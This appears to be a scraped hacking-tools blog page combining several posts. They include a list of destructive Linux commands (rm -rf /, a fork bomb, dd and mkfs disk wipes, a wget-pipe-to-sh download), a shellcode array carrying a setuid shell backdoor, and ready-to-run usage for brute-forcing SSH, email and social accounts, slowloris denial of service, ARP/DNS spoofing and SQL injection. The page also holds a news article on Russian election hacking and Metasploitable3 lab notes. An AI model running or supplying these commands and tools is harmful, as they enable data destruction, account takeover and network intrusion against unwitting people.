Dangerous Linux Commands

rm -rf Command

The rm -rf command is one of the fastest way to delete a folder and its contents. But a little typo or ignorance may result into unrecoverable system damage. The some of options used with rm command are.

1. rm command in Linux is used to delete files.
2. rm -r command deletes the folder recursively, even the empty folder.
3. rm -f command removes ‘Read only File’ without asking.
4. rm -rf / : Force deletion of everything in root directory.
5. rm -rf * : Force deletion of everything in current directory/working directory.
6. rm -rf . : Force deletion of current folder and sub folders.

Hence, be careful when you are executing rm -rf command. To overcome accidental delete of file by ‘rm‘ command, create an alias of ‘rm‘ command as ‘rm -i‘ in “.bashrc” file, it will ask you to confirm every deletion.

:(){:|:&};: Command

This command is actually a fork bomb. It operates by defining a function called ‘:‘, which calls itself twice, once in the foreground and once in the background. It keeps on executing again and again till the system freezes.

:(){:|:&};:

command > /dev/sda

The above example writes the output of ‘command‘ on the block /dev/sda. The above command writes raw data and all the files on the block will be replaced with raw data, thus resulting in total loss of data on the block.

mv folder /dev/null

The mv command will move ‘folder‘ to /dev/null. In Linux /dev/null or null device is a special file that discards all the data written to it and reports that write operation succeed.

# mv /home/user/* /dev/null

The above command will move all the contents of a User directory to /dev/null, which literally means everything there was sent to blackhole (null).

wget http://malicious_source -O- | sh

This wget example will download a script from a malicious source and then execute it.

mkfs.ext3 /dev/sda

The example will format the ‘sda’. After execution of the above command your Hard Disk Drive would be marked as ‘NEW’, You would be left without any data and in unrecoverable system stage.

> file

This command is used to flush the content of file. If the above command is executed with a typo or ignorance like “> xt.conf” it would ‘flush’ a configuration file or any other system file.

^foo^bar

This command is used to edit the previous run command without the need of retyping the whole command again. This can really be really dangerous.

dd if=/dev/random of=/dev/sda

This dd will wipe out the block device sda and write random junk. Your system would be left at inconsistent and unrecoverable stage.

Hidden Command

The command bellow is nothing more than a rm -rf. Here, the command is hidden in in hex and the user may be fooled into running it. Running this code will wipe your root partition. This command here shows that the threat may be hidden and not normally detectable sometimes.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Read More

An Intentionally Vulnerable Machine for Exploit Testing - Metasploitable3

Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. It is intended to be used as a target for testing exploits with metasploit .

Metasploitable3 is released under a BSD-style license. See COPYING for more details.

Building Metasploitable 3

System Requirements:

• OS capable of running all of the required applications listed below
• VT-x/AMD-V Supported Processor recommended
• 65 GB Available space on drive
• 2.5 GB RAM

Requirements:

• Packer
• Vagrant
• Vagrant Reload Plugin
• VirtualBox 5.1.6
• Internet connection

NOTE: A bug was recently discovered in VirtualBox 5.1.8 that is breaking provisioning. More information here .

NOTE: A bug was recently discovered in Vagrant 1.8.7 on OSX that is breaking provisioning. More information here .

To build automatically:

1. Run the build_win2008.sh script if using bash, or build_win2008.ps1 if using Windows.
2. If the command completes successfully, run 'vagrant up'.
3. When this process completes, you should be able to open the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.

To build manually:

1. Clone this repo and navigate to the main directory.
2. Build the base VM image by running packer build windows_2008_r2.json . This will take a while the first time you run it since it has to download the OS installation ISO.
3. After the base Vagrant box is created you need to add it to your Vagrant environment. This can be done with the command vagrant box add windows_2008_r2_virtualbox.box --name=metasploitable3 .
4. Use vagrant plugin install vagrant-reload to install the reload vagrant provisioner if you haven't already.
5. To start the VM, run the command vagrant up . This will start up the VM and run all of the installation and configuration scripts necessary to set everything up. This takes about 10 minutes.

6. Once this process completes, you can open up the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.

Vulnerabilities

• See the wiki page

More Information

The wiki has a lot more detail and serves as the main source of documentation. Please check it out .

Acknowledgements

The Windows portion of this project was based off of GitHub user joefitzgerald's packer-windows project. The Packer templates, original Vagrantfile, and installation answer files were used as the base template and built upon for the needs of this project.

Download Metasploitable3

Read More

Toolkit to quickly create various Payload, PowerShell Attack, Virus Attack and Launch Listener for a HID - Brutal

Brutal is extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction ( HID -ATTACK ) .When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of keystrokes to the target’s machine and completely compromise it, regardless of autorun. I’ve used it in my security testing to run recon or enumeration scripts, execute reverse shells, exploit local DLL hijack/privilege escalation vulnerabilities, and get all password . Now im develop new tools the name is Brutal

So what Brutal ?

Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device

Screenshoot

Video

• Do you want like a mr robot hacking scene when Angela moss plug usb into computer for get credential information ? you can choose payload in brutal ( optional 3 or 4 )
  

The Goal

• Generate various payload and powershell attack without coding
  
• To help breaking computer very fast and agile :p
  
• The Payloads Compatibility > target Windows machines only
  

Requirements

• Arduino Software ( I used v1.6.7 )
  
• TeensyDuino
  
• Linux udev rules
  
• How install all requirements ? Visit This Wiki
  

Supported Hardware
The following hardware has been tested and is known to work.

• Teensy 3.x
  
• Usb Cable 

Getting Started

1. Copy and paste the PaensyLib folder inside your Arduino\libraries
2. git clone https://github.com/Screetsec/Brutal.git
3. cd Brutal
4. chmod +x Brutal.sh
5. sudo ./Brutal.sh or sudo su ./Brutal.sh

Credits

• Thanks to allah and Screetsec [ Edo -maland- ]
• Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
• Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
• http://www.kali.org/ "
  
• Jack Wilder admin in http://www.linuxsec.org
• And another open sources tool in github

Download Brutal

Read More

Server-side Brute-force Module (ssh, ftp, smtp, facebook, and more) - brut3k1t

Server-side brute-force module. Brute-force (dictionary attack, jk) attack that supports multiple protocols and services.

1. Introduction
brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The current protocols that are complete and in support are:

ssh
ftp
smtp
XMPP
instagram
facebook

There will be future implementations of different protocols and services (including Twitter, Facebook, Instagram).

2. Installation
Installation is simple. brut3k1t requires several dependencies, although they will be installed by the program if you do not have it.

• argparse - utilized for parsing command line arguments
• paramiko - utilized for working with SSH connections and authentication
• ftplib - utilized for working with FTP connections and authentication
• smtplib - utilized for working with SMTP (email) connections and authentication
• fbchat - utilized for connecting with Facebook
• selenium - utilized for web scraping, which is used with Instagram (and later Twitter)
• xmppy - utiized for XMPP connections ...and more within the future!

Downloading is simple. Simply git clone .

git clone https://github.com/ex0dus-0x/brut3k1t

Change to directory:

cd /path/to/brut3k1t

3. Usage
Utilizing brut3k1t is a little more complicated than just running a Python file.
Typing python brut3k1t -h shows the help menu:

usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS]
               [-p PORT] [-d DELAY]

Server-side bruteforce module written in Python

optional arguments:
-h, --help            show this help message and exit
-a ADDRESS, --address ADDRESS
                    Provide host address for specified service. Required
                    for certain protocols
-p PORT, --port PORT  Provide port for host address for specified service.
                    If not specified, will be automatically set
-d DELAY, --delay DELAY
                    Provide the number of seconds the program delays as
                    each password is tried

required arguments:
-s SERVICE, --service SERVICE
                    Provide a service being attacked. Several protocols
                    and services are supported
-u USERNAME, --username USERNAME
                    Provide a valid username for service/protocol being
                    executed
-w PASSWORD, --wordlist PASSWORD
                    Provide a wordlist or directory to a wordlist

Examples of usage:
Cracking SSH server running on 192.168.1.3 using root and wordlist.txt as a wordlist.

python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt

The program will automatically set the port to 22, but if it is different, specify with -p flag.
Cracking email test@gmail.com with wordlist.txt on port 25 with a 3 second delay. For email it is necessary to use the SMTP server's address. For e.g Gmail = smtp.gmail.com . You can research this using Google.

python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlist.txt -p 25 -d 3

Cracking XMPP test@creep.im with wordlist.txt on default port 5222 . XMPP also is similar to SMTP, whereas you will need to provide the address of the XMPP server, in this case  creep.im .

python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt

Cracking Facebook is quite a challenge, since you will require the target user ID, not the username.

python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt

Cracking Instagram with username test with wordlist wordlist.txt and a 5 second delay

 python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5

## KEY NOTES TO REMEMBER

• If you do not supply the port -p flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um... web-based. :)
  
• If you do not supply the delay -d flag, the default delay in seconds will be 1.
  
• Remember, use the SMTP server address and XMPP server address for the address -a flag, when cracking SMTP and XMPP, respectively.
  
• Facebook requires the username ID. This is a little bit of a setback since some people do not display their ID publicly on their profile.
  
• Make sure the wordlist and its directory is specified. If it is in /usr/local/wordlists/wordlist.txt specify that for the wordlist -w flag.
  
• Remember that some protocols are not based on their default port. A FTP server will not necessarily always be on port 21 . Please keep that in mind.
  
• Use this for educational and ethical hacking purposes, as well as the sake of learning code and security-oriented practices. No script kiddies!
  

Download brut3k1t

Read More

Low bandwidth DoS tool - slowloris

Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this:

1. We start making lots of HTTP requests.
2. We send headers periodically (every ~15 seconds) to keep the connections open.
3. We never close the connection unless the server does so. If the server closes a connection, we create a new one keep doing the same thing.

This exhausts the servers thread pool and the server can't reply to other people.

How to install and run?
You can clone the git repo or install using pip . Here's how you run it.

• sudo pip3 install slowloris
• slowloris example.com

That's all it takes to install and run slowloris.py.
If you want to clone using git instead of pip, here's how you do it.

• git clone https://github.com/gkbrk/slowloris.git
• cd slowloris
• python3 slowloris.py example.com

Configuration options
It is possible to modify the behaviour of slowloris with command-line arguments.

Download slowloris

Read More

Web Application Security Testing Tool - Acunetix v11

London, UK – November 2016 – Acunetix, the pioneer in automated web application security software, has announced the release of version 11. New integrated vulnerability management features extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats – ordered by business criticality. Version 11 includes a new web-based UI for greater ease-of-use and manageability, providing access by multiple users.

For the first time in the marketplace Acunetix is launching an enterprise-level product that integrates sophisticated automated testing technology with vulnerability management, at a price point accessible to every development team. Chris Martin, CEO, Acunetix explains:

“Acunetix has for the past 12 years been at the forefront in web application security with its cutting-edge vulnerability scanning technology. With version 11 we have combined proactive scanning for web application vulnerabilities with the prioritization of mitigation activities. This integration helps security teams gain the intelligence they need to work more efficiently, prioritizing actions, assigning jobs and therefore reducing costs.”

The new web-based interface significantly improves the manageability of the Acunetix on-premises solution, making it easy for less seasoned security personnel to check the vulnerabilities within the company’s web assets. In addition, user privileges can be automatically assigned.

Nicholas Sciberras, CTO, Acunetix, comments: “Version 11 helps organizations engaged heavily in application development by utilising a role-based multi-user system.”

Inbuilt Vulnerability Management

New integrated vulnerability management features allow for the review of aggregated vulnerability data across all Targets, prioritizing security risks and therefore providing a clear view of the business’ security posture, while facilitating compliance.

New inbuilt vulnerability management features include:

• All Targets (web applications to scan) are now stored in Acunetix with their individual settings and can be easily re-scanned.
• Targets are displayed in one interface and classified by business criticality, allowing you to easily focus on the most important assets.
• Vulnerabilities can also be prioritized by the Target’s business criticality.
• Consolidated reports are stored in the central interface.
• Users can choose between “Target reports”, “Scan reports” or “All Vulnerabilities” report.

Web-based user interface

The user interface has been re-engineered from the ground up for greater usability and manageability. The minimalist design focuses on the most widely used and important features, doing away with extras which cluttered the screen. Since the interface is now web-based, multiple users can access it from their browser irrespective of the OS used.

Role-based multi-user system

Acunetix version 11 allows the creation of multiple user accounts, which can be assigned a particular group of targets. Depending on the privileges assigned to the user, the user can create, scan, and report on the targets assigned to him.This is particularly important for large enterprises, which require multiple users to help secure their assets.

Standard, Pro and Enterprise Editions

Acunetix version 11 will be available in three main editions: Standard, Pro and Enterprise.

Standard Edition – is the entry level, ideal for small organisations and single workstation users. The Standard Edition offers the same level of vulnerability detection provided in the Pro and Enterprise Editions and includes Developer, Executive Summary and OWASP Top 10 reports.

Pro Edition – The Pro Edition allows outsourced or insourced security professionals to group and classify asset targets. It integrates with Software Development Life Cycle (SDLC) project management or bug tracking systems, includes comprehensive compliance reports, and integrates with top Web Application Firewalls (WAFs).

Enterprise Edition – includes full multi-user team support and has the ability to deploy multiple scan engines managed by the central system. The Enterprise Edition will be able to scale from 3 to unlimited users and up to 50 Acunetix scan engines.

Download Acunetix v11

Read More

Windows Tool For Spoofing The Mac Address - WinMACSpoofer

Windows application for spoofing the MAC address and host name.

Usage
The program must be run in "administrator mode" for the functions to work properly

1. Set a new Random MAC address
   
   • Press the randomize button to generate a random MAC address
   • Click the random radio button and hit "Set New Mac" to reset your MAC address to this new address
2. Set the MAC address manually
   
   • To use a specially selected MAC address enter the desired values in the text fields
   • CAUTION The second nibble can only be set with a value of ('A', 'E', '2' or '6')
   • e.g. xy-xx-xx-xx-xx-xx, y represents the second nibble and must be represented by ('A', 'E', '2' or '6')
   • x can be represented by any hexadecimal value
3. Reset the MAC address
   
   • To revert the MAC adrress back to the network adapter's original values press the "reset" button
4. Change Host Name
   
   • Enter the desired host name and press "Change Host Name"

Download WinMACSpoofer

Read More

Poison, Reset, Spoof, Redirect MITM Script - creak

Performs some of the most famous MITM attack on target addresses located in a local network. Among these, deny navigation and download capabilities of a target host in the local network performing an ARP poison attack and sending reset TCP packets to every request made to the router. Born as a didactic project for learning python language, I decline every responsibility for any abuse, including malevolent or illegal use of this code.

Installation

$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install

or simply clone the repository and run the creak.py after all requirements are installed:

$ git clone https://github.com/codepr/creak.git

It is required to have installed pcap libraries for raw packet manipulations and dpkt module, for dns spoofing options is required to have installed dnet module from libdnet package, do not confuse it with pydnet (network evaluation tool) module. It can use also scapy if desired, can just be set in the config.py file.

Options

Usage: creak.py [options] dev

Options:
  -h, --help           show this help message and exit
  -1, --sessions-scan  Sessions scan mode
  -2, --dns-spoof      Dns spoofing
  -3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
  -x, --spoof          Spoof mode, generate a fake MAC address to be used
                       during attack
  -m MACADDR           Mac address octet prefix (could be an entire MAC
                       address in the form AA:BB:CC:DD:EE:FF)
  -M MANUFACTURER      Manufacturer of the wireless device, for retrieving a
                       manufactur based prefix for MAC spoof
  -s SOURCE            Source ip address (e.g. a class C address like
                       192.168.1.150) usually the router address
  -t TARGET            Target ip address (e.g. a class C address like
                       192.168.1.150), can be specified multiple times
  -p PORT              Target port to shutdown
  -a HOST              Target host that will be redirect while navigating on
                       target machine
  -r REDIR             Target redirection that will be fetched instead of host
                       on the target machine
  -v, --verbose        Verbose output mode
  -d, --dotted         Dotted output mode

Example
Most basic usage: Deny all traffic to the target host

$ python creak.py -t 192.168.1.30 wlan0

Set a different gateway:

$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0

Set a different mac address for the device:

$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0

Spoof mac address generating a fake one:

$ python creak.py -x -t 192.168.1.30 wlan0

Spoof mac address generating one based on manufacturer(e.g Xeros):

$ python creak.py -x -M xeros -t 192.168.1.30 wlan0

DNS spoofing using a fake MAC address, redirecting ab.xy to cd.xz(e.g. localhost):

$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0

Deny multiple hosts in the subnet:

$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0

Download creak

Read More

Obama expels 35 Russian diplomats in retaliation for US election hacking

The Obama administration on Thursday announced its retaliation for Russian efforts to interfere with the US presidential election, ordering sweeping new sanctions that included the expulsion of 35 Russians.
Syria ceasefire appears to hold after rivals sign Russia-backed deal
Read more

US intelligence services believe Russia ordered cyber-attacks on the Democratic National Committee (DNC), Hillary Clinton’s campaign and other political organizations, in an attempt to influence the election in favor of the Republican candidate, Donald Trump.

In a statement issued two weeks after the president said he would respond to cyber-attacks by Moscow “at a time and place of our choosing”, Obama said Americans should “be alarmed by Russia’s actions” and pledged further action. 

“I have issued an executive order that provides additional authority for responding to certain cyber activity that seeks to interfere with or undermine our election processes and institutions, or those of our allies or partners,” Obama said in the statement, released while he was vacationing with his family in Hawaii.

“Using this new authority, I have sanctioned nine entities and individuals: the GRU and the FSB, two Russian intelligence services; four individual officers of the GRU; and three companies that provided material support to the GRU’s cyber operations.

“In addition, the secretary of the treasury is designating two Russian individuals for using cyber-enabled means to cause misappropriation of funds and personal identifying information.” He also announced the closure of two Russian compounds in the US.

Obama added that more actions would be taken, “some of which will not be publicized”.

On Thursday, Trump, who has previously dismissed reports of Russian interference in the election, said in a statement: “It’s time for our country to move on to bigger and better things.”
Advertisement

He added, however, that “in the interest of our country and its great people, I will meet with leaders of the intelligence community next week in order to be updated on the facts of this situation.”

In a conference call with reporters, senior White House officials said the president-elect’s transition team was informed of the sanctions before they were announced on Thursday. Trump and Obama spoke on Wednesday, they said.

The officials added that the actions were a necessary response to “very disturbing Russian threats to US national security”.

“There has to be a cost and a consequence for what Russia has done,” a senior administration official said. “It is in a extraordinary step for them to interfere in the democratic process here in the United States of America. There needs to be a price for that.”

In Moscow, a Putin spokesman said Russia regretted the new sanctions and would consider retaliatory measures.

Diplomatic expulsions are normally met with exactly reciprocal action. In this case, however, Moscow may pause for thought. With Trump, who has spoken positively about Russia and Vladimir Putin, just three weeks away from the White House, Russia may feel it is inadvisable to kick out 35 US diplomats.

However, Russian authorities on Thursday ordered the Anglo-American School of Moscow closed, according to CNN, citing a US official briefed on the matter. The school serves children of US, British and Canadian embassy personnel, and would effectively make a Russian posting difficult for US diplomats with families.

Konstantin Kosachyov, chairman of the international affairs committee in the upper house of the Russian parliament, was quoted by the RIA news agency as saying the US move represented “the death throes of political corpses”.

The Twitter feed of the Russian embassy in London, meanwhile, called the Obama administration “hapless” and attached a picture of a duck with the word “LAME” emblazoned across it.

On the White House call, officials were asked about the prospect of Trump overturning the sanctions. They acknowledged that a future president could reverse course but warned against such an “inadvisable” step.

“We have no reason to believe that Russia’s activities will cease,” a senior official said. “One reason why I think it is necessary to sustain these actions is because there’s every reason to believe Russia will interfere with future US elections.”

On Capitol Hill, Democrats applauded the president’s action, called for further measures and emphasized bipartisan support for a thorough investigation into Russian hacking.

“I hope the incoming Trump administration, which has been far too close to Russia throughout the campaign and transition, won’t think for one second about weakening these new sanctions or our existing regime,” incoming Senate minority leader Chuck Schumer said in a statement.

“Both parties ought to be united in standing up to Russian interference in our elections, to their cyber attacks, their illegal annexation of Crimea and other extra-legal interventions.”

Ben Cardin, the top Democrat on the Senate foreign relations committee, called for further sanctions from the new Congress when it convenes in January.

GOP leaders were quick to frame the new sanctions as too little, too late.

“While today’s action by the administration is overdue,” House speaker Paul Ryan said in a statement, “it is an appropriate way to end eight years of failed policy with Russia. And it serves as a prime example of this administration’s ineffective foreign policy that has left America weaker in the eyes of the world.”

Republican senators John McCain and Lindsey Graham, two of Russia’s fiercest critics, echoed Ryan but also called for tough Congressional sanctions.

“Ultimately, [the sanctions] are a small price for Russia to pay for its brazen attack on American democracy,” the two men said in a joint statement. “We intend to lead the effort in the new Congress to impose stronger sanctions on Russia.”

 The 35 Russian diplomats being expelled are “intelligence operatives”, Obama said. The state department has declared them “persona non grata” and they will be given 72 hours to leave the country.

Starting on Friday at noon, the White House said, Russia will be denied access to compounds in Maryland and New York that have been used for intelligence-related purposes.

A statement from the state department said the diplomatic expulsions were a response not only to hacking but to “a pattern of harassment of our diplomats overseas, that has increased over the last four years, including a significant increase in the last 12 months”.

The statement said the harassment has included “arbitrary police stops, physical assault, and the broadcast on state TV of personal details about our personnel that put them at risk”.

For some time, US diplomats in Russia have anecdotally reported being followed and harassed by police.

In June, a US diplomat was wrestled to the ground by a policeman as he scrambled to get inside the embassy. Russian authorities said the man was a CIA agent operating under diplomatic cover.

Source: theguardian

Read More

Java application for automatic SQL database injection - jSQL Injection v0.77

jSQL Injection is a lightweight application used to find database information from a distant server.

It's is free , open source and cross-platform (Windows, Linux, Mac OS X).

jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in distributions like Pentest Box , Parrot Security OS , ArchStrike and BlackArch Linux.

Installation
Install Java , then download the latest release of jSQL and double-click on the .jar to launch the software.
You can also type java -jar jsql-injection-v0.77.jar in your terminal to start the program.

Screenshots

Roadmap

WAF tamper, HTTP Auth Bruteforce, Translation, SOAP injection, Command line interface, Databases: Access Cassandra MongoDb and Neo4j

Change log

v0.76 Czech translation, 17 Database flavors: SQLite
v0.75 URI injection point, Mavenify, Upgrade to Java 7, Optimized UI
v0.73 Authentication: Basic Digest Negotiate NTLM and Kerberos, Database flavor selection
v0.7 Scan multiple URLs, Github Issue reporter, 16 Database flavors: Cubrid Derby H2 HSQLDB MariaDB and Teradata, Optimized UI
alpha-v0.6 Speed x2: No hex encoding, 10 Database flavors: MySQL Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb and Sybase, JUnit tests, Log4j, Translation
0.5 SQL Shell, Uploader
0.4 Admin page, Hash bruteforce like MD5 and MySQL, Text encoder/decoder like Base64, Hex and MD5
0.3 File injection, Web Shell, Integrated terminal, Configuration backup, Update checker
0.2 Algorithm Time, Multi-thread control: Start Pause Resume and Stop, Log URL calls
0.0-0.1 Method GET POST Header and Cookie, Algorithm Normal Error and Blind, Best algorithm selection, Progression bars, Simple evasion, Proxy settings, MySQL only

jSQL Injection

Read More

Utilities for listing the processes running on remote computers, running processes remotely, rebooting computers, and more - PsTools

The PsTools suite includes command-line utilities for listing the processes running on local or remote computers, running processes remotely, rebooting computers, dumping event logs, and more.

Introduction 

 The Windows NT and Windows 2000 Resource Kits come with a number of command-line tools that help you administer your Windows NT/2K systems. Over time, I've grown a collection of similar tools, including some not included in the Resource Kits. What sets these tools apart is that they all allow you to manage remote systems as well as the local one. The first tool in the suite was PsList, a tool that lets you view detailed information about processes, and the suite is continually growing. The "Ps" prefix in PsList relates to the fact that the standard UNIX process listing command-line tool is named "ps", so I've adopted this prefix for all the tools in order to tie them together into a suite of tools named PsTools.

Note: some anti-virus scanners report that one or more of the tools are infected with a "remote admin" virus. None of the PsTools contain viruses, but they have been used by viruses, which is why they trigger virus notifications.

The tools included in the PsTools suite, which are downloadable as a package, are:

• PsExec - execute processes remotely
• PsFile - shows files opened remotely
• PsGetSid - display the SID of a computer or a user
• PsInfo - list information about a system
• PsPing - measure network performance
• PsKill - kill processes by name or process ID
• PsList - list detailed information about processes
• PsLoggedOn - see who's logged on locally and via resource sharing (full source is included)
• PsLogList - dump event log records
• PsPasswd - changes account passwords
• PsService - view and control services
• PsShutdown - shuts down and optionally reboots a computer
• PsSuspend - suspends processes
• PsUptime - shows you how long a system has been running since its last reboot (PsUptime's functionality has been incorporated into PsInfo)

The PsTools download package includes an HTML help file with complete usage information for all the tools.

Download PsTools

Read More